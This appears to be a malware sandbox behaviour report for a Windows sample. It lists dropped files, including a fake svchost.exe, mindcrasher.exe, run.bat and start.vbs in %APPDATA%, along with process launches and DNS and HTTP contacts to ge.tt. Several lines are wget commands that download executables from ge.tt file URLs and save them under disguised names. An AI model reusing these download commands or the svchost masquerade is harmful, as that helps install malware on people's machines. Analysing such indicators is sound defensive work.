Technical Information
- '%APPDATA%\Roaming\mindcrasher.exe'
- '%APPDATA%\Roaming\svchost.exe'
- '%APPDATA%\Roaming\wget.exe' http://ge.tt/api/1/files/3zdsT0l/0/blob?do###### -O "%APPDATA%\Roaming\svchost.exe"
- '%APPDATA%\Roaming\wget.exe' http://ge.tt/api/1/files/4JSmV8l/0/blob?do###### -O "%APPDATA%\Roaming\mindcrasher.exe"
- '%APPDATA%\Roaming\svchost.exe' (downloaded from the Internet)
- '%APPDATA%\Roaming\mindcrasher.exe' (downloaded from the Internet)
- '<SYSTEM32>\cmd.exe' /c ""%APPDATA%\Roaming\run.bat" "
- '<SYSTEM32>\WScript.exe' "%APPDATA%\Roaming\start.vbs"
- %APPDATA%\Roaming\mindcrasher.exe
- C:\ProgramData\Microsoft\RAC\Temp\sqlAEF5.tmp
- C:\ProgramData\Microsoft\RAC\Temp\sqlAEE4.tmp
- %APPDATA%\Roaming\svchost.exe
- %APPDATA%\Roaming\run.bat
- %APPDATA%\Roaming\start.vbs
- %APPDATA%\Roaming\wget.exe
- C:\ProgramData\Microsoft\RAC\Temp\sqlAEE4.tmp
- C:\ProgramData\Microsoft\RAC\Temp\sqlAEF5.tmp
- 'ge.tt':80
- ge.tt/api/1/files/4JSmV8l/0/blob?do######
- ge.tt/api/1/files/3zdsT0l/0/blob?do######
- DNS ASK ge.tt
- ClassName: 'EDIT' WindowName: '(null)'